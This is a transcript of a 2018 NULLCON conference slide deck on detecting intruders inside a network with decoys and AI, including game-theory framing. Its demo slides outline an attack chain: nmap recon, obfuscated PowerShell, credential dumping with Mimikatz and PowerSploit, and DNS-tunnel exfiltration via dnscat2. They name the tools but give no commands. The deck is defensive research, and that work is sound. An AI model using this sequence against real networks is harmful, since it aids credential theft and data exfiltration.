a game between nullcon adversary and ai scientistadversary and ai scientist. who am i • at acalvio...
TRANSCRIPT
![Page 1: A Game between NULLCON Adversary and AI ScientistAdversary and AI Scientist. Who am I • At Acalvio from Day 1 • 15+ Years in DS, ML, AI • General Motors, Samsung Research, CA](https://reader034.vdocument.in/reader034/viewer/2022042321/5f0aeed67e708231d42e0d95/html5/thumbnails/1.jpg)
Satnam, Arunabha, Deepak, Waseem, Nirmesh, Santosh,
Balamurali, Narayana Acalvio Technologies
NULLCON March 3, 2018
A Game between Adversary and AI Scientist
![Page 2: A Game between NULLCON Adversary and AI ScientistAdversary and AI Scientist. Who am I • At Acalvio from Day 1 • 15+ Years in DS, ML, AI • General Motors, Samsung Research, CA](https://reader034.vdocument.in/reader034/viewer/2022042321/5f0aeed67e708231d42e0d95/html5/thumbnails/2.jpg)
Who am I
• At Acalvio from Day 1
• 15+ Years in DS, ML, AI
• General Motors, Samsung Research, CA Technologies
• Author- Patents, Tech Pubs and Tech Talks
• Rock Climber
![Page 3: A Game between NULLCON Adversary and AI ScientistAdversary and AI Scientist. Who am I • At Acalvio from Day 1 • 15+ Years in DS, ML, AI • General Motors, Samsung Research, CA](https://reader034.vdocument.in/reader034/viewer/2022042321/5f0aeed67e708231d42e0d95/html5/thumbnails/3.jpg)
Outline
• Define the Problem
• A possible solution - research work
• Demos
• Under the hood
![Page 4: A Game between NULLCON Adversary and AI ScientistAdversary and AI Scientist. Who am I • At Acalvio from Day 1 • 15+ Years in DS, ML, AI • General Motors, Samsung Research, CA](https://reader034.vdocument.in/reader034/viewer/2022042321/5f0aeed67e708231d42e0d95/html5/thumbnails/4.jpg)
Problem
![Page 5: A Game between NULLCON Adversary and AI ScientistAdversary and AI Scientist. Who am I • At Acalvio from Day 1 • 15+ Years in DS, ML, AI • General Motors, Samsung Research, CA](https://reader034.vdocument.in/reader034/viewer/2022042321/5f0aeed67e708231d42e0d95/html5/thumbnails/5.jpg)
Can we play a game with adversary?
Can we engage with adversary?
![Page 6: A Game between NULLCON Adversary and AI ScientistAdversary and AI Scientist. Who am I • At Acalvio from Day 1 • 15+ Years in DS, ML, AI • General Motors, Samsung Research, CA](https://reader034.vdocument.in/reader034/viewer/2022042321/5f0aeed67e708231d42e0d95/html5/thumbnails/6.jpg)
Is adversary visible to defender?
- Extensive reconnaissance of target and defender
- Using the same tools and techniques as defender
![Page 7: A Game between NULLCON Adversary and AI ScientistAdversary and AI Scientist. Who am I • At Acalvio from Day 1 • 15+ Years in DS, ML, AI • General Motors, Samsung Research, CA](https://reader034.vdocument.in/reader034/viewer/2022042321/5f0aeed67e708231d42e0d95/html5/thumbnails/7.jpg)
Is he a “Returning” Adversary?
—> Compare Tools, Tactics and Procedures (TTPs)
![Page 8: A Game between NULLCON Adversary and AI ScientistAdversary and AI Scientist. Who am I • At Acalvio from Day 1 • 15+ Years in DS, ML, AI • General Motors, Samsung Research, CA](https://reader034.vdocument.in/reader034/viewer/2022042321/5f0aeed67e708231d42e0d95/html5/thumbnails/8.jpg)
InfoSec Game: Assumptions
• Unlike Chess, cyber game has infinite state space
—> Use Mitre ATT@CK model to define the state space
![Page 9: A Game between NULLCON Adversary and AI ScientistAdversary and AI Scientist. Who am I • At Acalvio from Day 1 • 15+ Years in DS, ML, AI • General Motors, Samsung Research, CA](https://reader034.vdocument.in/reader034/viewer/2022042321/5f0aeed67e708231d42e0d95/html5/thumbnails/9.jpg)
Adversary Tactics
![Page 10: A Game between NULLCON Adversary and AI ScientistAdversary and AI Scientist. Who am I • At Acalvio from Day 1 • 15+ Years in DS, ML, AI • General Motors, Samsung Research, CA](https://reader034.vdocument.in/reader034/viewer/2022042321/5f0aeed67e708231d42e0d95/html5/thumbnails/10.jpg)
Mitre ATT@CK Model
![Page 11: A Game between NULLCON Adversary and AI ScientistAdversary and AI Scientist. Who am I • At Acalvio from Day 1 • 15+ Years in DS, ML, AI • General Motors, Samsung Research, CA](https://reader034.vdocument.in/reader034/viewer/2022042321/5f0aeed67e708231d42e0d95/html5/thumbnails/11.jpg)
Defender’s Tools are at Perimeter
Need new tools to detect adversary INSIDE the NETWORK
![Page 12: A Game between NULLCON Adversary and AI ScientistAdversary and AI Scientist. Who am I • At Acalvio from Day 1 • 15+ Years in DS, ML, AI • General Motors, Samsung Research, CA](https://reader034.vdocument.in/reader034/viewer/2022042321/5f0aeed67e708231d42e0d95/html5/thumbnails/12.jpg)
Deceptions in Enterprise
• Deceptions (D) • Emulations of Hosts,
Applications, Database Servers, etc.
• Real VM Hosts, Applications, etc.
• Browser Cookies, Registry entries, etc.
• Vulnerability in OS/Application, Shares, etc.
MUM-EPS-4343
Enterprise Network
SOC segment
Engineering
Fiber
Deceptions
SOC
Ops Segment
Sales
Operations
MUM-EPS-4322MUM-EPS-4453
SFO-GAMMA-2318
SFO-GAMMA-3123
BENG-ALPHA-4323BENG-ALPHA-5662
![Page 13: A Game between NULLCON Adversary and AI ScientistAdversary and AI Scientist. Who am I • At Acalvio from Day 1 • 15+ Years in DS, ML, AI • General Motors, Samsung Research, CA](https://reader034.vdocument.in/reader034/viewer/2022042321/5f0aeed67e708231d42e0d95/html5/thumbnails/13.jpg)
AI Engine
Process Registry Bro
…
HIDS Log
AI Engine
![Page 14: A Game between NULLCON Adversary and AI ScientistAdversary and AI Scientist. Who am I • At Acalvio from Day 1 • 15+ Years in DS, ML, AI • General Motors, Samsung Research, CA](https://reader034.vdocument.in/reader034/viewer/2022042321/5f0aeed67e708231d42e0d95/html5/thumbnails/14.jpg)
Game: Demos
![Page 15: A Game between NULLCON Adversary and AI ScientistAdversary and AI Scientist. Who am I • At Acalvio from Day 1 • 15+ Years in DS, ML, AI • General Motors, Samsung Research, CA](https://reader034.vdocument.in/reader034/viewer/2022042321/5f0aeed67e708231d42e0d95/html5/thumbnails/15.jpg)
1: Recon - nmap
• Defender detects it and provides a few RDP credentials on the endpoints
Adversary Defender
• Adversary performs recon and nmap to find out to the neighbourhood
Demo>>
![Page 16: A Game between NULLCON Adversary and AI ScientistAdversary and AI Scientist. Who am I • At Acalvio from Day 1 • 15+ Years in DS, ML, AI • General Motors, Samsung Research, CA](https://reader034.vdocument.in/reader034/viewer/2022042321/5f0aeed67e708231d42e0d95/html5/thumbnails/16.jpg)
2: Obfuscated PowerShell Script
• Adversary obfuscates PowerShell attack and executes in another host
Adversary Defender
• Defender detects obfuscated PowerShell commands
Demo>>
![Page 17: A Game between NULLCON Adversary and AI ScientistAdversary and AI Scientist. Who am I • At Acalvio from Day 1 • 15+ Years in DS, ML, AI • General Motors, Samsung Research, CA](https://reader034.vdocument.in/reader034/viewer/2022042321/5f0aeed67e708231d42e0d95/html5/thumbnails/17.jpg)
3: Credentials Dump using PowerSploit and Mimikatz
Adversary
• Attacker dumps credentials using PowerSpoit and Mimikartz
Defender
• Defender detects PowerSploit and Mimikartz activities
Demo>>
![Page 18: A Game between NULLCON Adversary and AI ScientistAdversary and AI Scientist. Who am I • At Acalvio from Day 1 • 15+ Years in DS, ML, AI • General Motors, Samsung Research, CA](https://reader034.vdocument.in/reader034/viewer/2022042321/5f0aeed67e708231d42e0d95/html5/thumbnails/18.jpg)
4: Data Exfilteration via DNS Tunnel
• Adversary uses DNS Tunnel using DNSCat2 to exfiltrate the credentials
Adversary Defender
• Defender detects the DNS tunnel using AI
Demo>>
![Page 19: A Game between NULLCON Adversary and AI ScientistAdversary and AI Scientist. Who am I • At Acalvio from Day 1 • 15+ Years in DS, ML, AI • General Motors, Samsung Research, CA](https://reader034.vdocument.in/reader034/viewer/2022042321/5f0aeed67e708231d42e0d95/html5/thumbnails/19.jpg)
Under the Hood
![Page 20: A Game between NULLCON Adversary and AI ScientistAdversary and AI Scientist. Who am I • At Acalvio from Day 1 • 15+ Years in DS, ML, AI • General Motors, Samsung Research, CA](https://reader034.vdocument.in/reader034/viewer/2022042321/5f0aeed67e708231d42e0d95/html5/thumbnails/20.jpg)
High Interaction AI Engine
Adversary D Process Registry Winevent
…
HIDS Log
HISH AI EnginesSummarisation
DNS Tunnel Detector
Powershell Log Analyser
![Page 21: A Game between NULLCON Adversary and AI ScientistAdversary and AI Scientist. Who am I • At Acalvio from Day 1 • 15+ Years in DS, ML, AI • General Motors, Samsung Research, CA](https://reader034.vdocument.in/reader034/viewer/2022042321/5f0aeed67e708231d42e0d95/html5/thumbnails/21.jpg)
HISH AI: HIDS Log Summarisation
Summarised Notables
Event Summarisation
• Summarise attacker’s activities - New services, processes, tasks and changes etc. - File system changes, registry entries, etc. - Shell commands, Windows event and authentication logs etc. File Event Logs
.
.
.
Process Logs
Registry Logs
Win Events Logs
![Page 22: A Game between NULLCON Adversary and AI ScientistAdversary and AI Scientist. Who am I • At Acalvio from Day 1 • 15+ Years in DS, ML, AI • General Motors, Samsung Research, CA](https://reader034.vdocument.in/reader034/viewer/2022042321/5f0aeed67e708231d42e0d95/html5/thumbnails/22.jpg)
HISH-AI: Summarisation Engine
Raw Log Preprocessing
Registry LogsFile Logs
.
.
.
Process LogsServices Logs
Bro Logs
Rule & Baseline Based Filtering
Domain Knowledge
Rules
Learned Baseline
Baseline
Summarised Notables
Attack Scenarios
Input Logs
Output Notables
Incident 1 60K 16Incident 2 6K 5Incident 3 70K 6
Process-based Summarisation
![Page 23: A Game between NULLCON Adversary and AI ScientistAdversary and AI Scientist. Who am I • At Acalvio from Day 1 • 15+ Years in DS, ML, AI • General Motors, Samsung Research, CA](https://reader034.vdocument.in/reader034/viewer/2022042321/5f0aeed67e708231d42e0d95/html5/thumbnails/23.jpg)
HISH-AI: PowerShell Log Engine
PreProcessing
Command N-GRAM
Character N-GRAM
Obfuscation Detection Model
Tactic Detection Model
Obfuscation Prediction
Tactic Prediction(Privilege Escalation, Lateral Movement, Exfiltration)
PowerShell Logs
Tensorflow ANN
Classifier
![Page 24: A Game between NULLCON Adversary and AI ScientistAdversary and AI Scientist. Who am I • At Acalvio from Day 1 • 15+ Years in DS, ML, AI • General Motors, Samsung Research, CA](https://reader034.vdocument.in/reader034/viewer/2022042321/5f0aeed67e708231d42e0d95/html5/thumbnails/24.jpg)
HISH-AI:Data exfiltration using DNS Tunnel
dns tunnel server (dnstunnel.com)
dns trafficlocal dns server
dns tunnel client
web traffic data.dnstunnel.com
dns query: data.dnstunnel.com
DNS Tunnelling ToolsIodine, dnscat2, Ozyman
Enterprise Network
![Page 25: A Game between NULLCON Adversary and AI ScientistAdversary and AI Scientist. Who am I • At Acalvio from Day 1 • 15+ Years in DS, ML, AI • General Motors, Samsung Research, CA](https://reader034.vdocument.in/reader034/viewer/2022042321/5f0aeed67e708231d42e0d95/html5/thumbnails/25.jpg)
HISH-AI: DNS Tunnel Detection
DNS logs
Flow-based features
Deep learning based ModelPacket
metadata- based
features
DNS Tunnel prediction
Model update
TensorFlow
DNS tunnel detection output: • IP and domain of tunnelling server: dnstunnel.com • tunnel start time: 26-02-2018 19:43:37 • tunnel end time: 26-02-2018 19:53:37
![Page 26: A Game between NULLCON Adversary and AI ScientistAdversary and AI Scientist. Who am I • At Acalvio from Day 1 • 15+ Years in DS, ML, AI • General Motors, Samsung Research, CA](https://reader034.vdocument.in/reader034/viewer/2022042321/5f0aeed67e708231d42e0d95/html5/thumbnails/26.jpg)
Game Theory
![Page 27: A Game between NULLCON Adversary and AI ScientistAdversary and AI Scientist. Who am I • At Acalvio from Day 1 • 15+ Years in DS, ML, AI • General Motors, Samsung Research, CA](https://reader034.vdocument.in/reader034/viewer/2022042321/5f0aeed67e708231d42e0d95/html5/thumbnails/27.jpg)
Formally Defining A Game
Defining Game - The Normal Form Finite 2-person normal form game: <N,A,u>:
- Players: N={Adversary, Defender} is a finite set of 2 players, indexed by i
- Action set for player i — Ai
a={a1,...,an}
- Utility function or Payoff function for player i: ui
u=(u1,...,un) is a profile of utility functions
![Page 28: A Game between NULLCON Adversary and AI ScientistAdversary and AI Scientist. Who am I • At Acalvio from Day 1 • 15+ Years in DS, ML, AI • General Motors, Samsung Research, CA](https://reader034.vdocument.in/reader034/viewer/2022042321/5f0aeed67e708231d42e0d95/html5/thumbnails/28.jpg)
InfoSec Game
Carry out attack
Quit
Allow the attack
1,2 2,1
Block the adversary
2,2 2,0
Adversary
Defender
• Too simplistic • How to scale it for the real world? • How do we learn in real time?
• "Row" player is Defender, "column" player is Adversary
![Page 29: A Game between NULLCON Adversary and AI ScientistAdversary and AI Scientist. Who am I • At Acalvio from Day 1 • 15+ Years in DS, ML, AI • General Motors, Samsung Research, CA](https://reader034.vdocument.in/reader034/viewer/2022042321/5f0aeed67e708231d42e0d95/html5/thumbnails/29.jpg)
Model as Reinforcement Learning Problem
• Break the problem into Subproblems and learn in real-time • Model it as Reinforcement Learning Problem
![Page 30: A Game between NULLCON Adversary and AI ScientistAdversary and AI Scientist. Who am I • At Acalvio from Day 1 • 15+ Years in DS, ML, AI • General Motors, Samsung Research, CA](https://reader034.vdocument.in/reader034/viewer/2022042321/5f0aeed67e708231d42e0d95/html5/thumbnails/30.jpg)
Summary
• Playing a game needs “Visibility” of the adversary
• Need to surface signal in low SNR
• Fusion of Deception+AI gives a way to engage with the adversary
![Page 31: A Game between NULLCON Adversary and AI ScientistAdversary and AI Scientist. Who am I • At Acalvio from Day 1 • 15+ Years in DS, ML, AI • General Motors, Samsung Research, CA](https://reader034.vdocument.in/reader034/viewer/2022042321/5f0aeed67e708231d42e0d95/html5/thumbnails/31.jpg)
Questions?
@satnam74s